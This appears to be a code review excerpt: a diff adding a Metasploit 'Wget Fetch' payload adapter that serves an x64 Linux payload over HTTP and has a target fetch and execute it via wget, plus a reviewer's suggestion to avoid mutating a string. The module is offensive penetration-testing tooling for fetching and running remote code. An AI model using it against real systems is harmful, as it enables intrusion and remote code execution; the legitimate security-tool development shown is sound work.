modules/payloads/adapters/cmd/linux/x64/wget.rb

```diff
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Exploit::EXE
+  include Msf::Payload::Adapter
+  include Msf::Payload::Adapter::Fetch
+  include Msf::Payload::Adapter::Fetch::WgetHttp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wget Fetch',
+        'Description' => 'Fetch and Execute an x64 payload from a command via wget',
+        'Author' => 'Brendan Watters',
+        'Platform' => 'linux',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X64,
+        'AdaptedPlatform' => 'linux',
+        'RequiredCmd' => 'wget'
+      )
+    )
+  end
+
+  def download_uri
+    srvhost = datastore['FETCH_SRVHOST']
+    srvport = datastore['FETCH_SRVPORT']
+    proto = datastore['WGET_PROTOCOL']
+    uri = datastore['FETCH_URIPATH']
+    if srvhost == '0.0.0.0'
+      raise ArgumentError 'You must set FETCH_SRVHOST'
+    end
+
+    fetch_uri = 'http://' if proto == 'HTTP'
+    fetch_uri = 'https://' if proto == 'HTTPS'
+    fetch_uri << "#{srvhost}:#{srvport}/#{uri}"
+  end
+
+  def start_http_server(srvhost, srvport)
+    begin
+      service = Rex::ServiceManager.start(
+        Rex::Proto::Http::Server,
+        srvport, srvhost, false,
+        {
+          'Msf' => framework,
+          'MsfExploit' => self
+        },
+        ::Rex::Socket::Comm::Local,
+        nil,
+        nil,
+        nil,
+        nil
+      )
+    rescue StandardError => e
+      print_error("Handler failed to bind to #{srvhost}:#{srvport}\n #{e}")
+    end
+    print_status("Fetch Handler listening on #{srvhost}:#{srvport}")
+    service
+  end
+
+  def remote_destination
+    writable_dir = datastore['FETCH_WRITABLE_DIR']
+    writable_dir += '/' unless writable_dir[-1] == '/'
+    payload_path = writable_dir + datastore['FETCH_FILENAME']
+    payload_path
+  end
+
+  def payload_response
+    res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
+    res['Content-Type'] = 'text/html'
+    res.body = @served_payload_exe.to_s.unpack('C*').pack('C*')
+    res
+  end
+
+  def on_request_uri(cli, request)
+    client = cli.peerhost
+    print_status("Client #{client} requested #{request.uri}")
+    if (user_agent = request.headers['User-Agent'])
+      client << " (#{user_agent})"
```

Comment:
```suggestion
      client += " (#{user_agent})"
```

Otherwise this code is mutating a string we don't own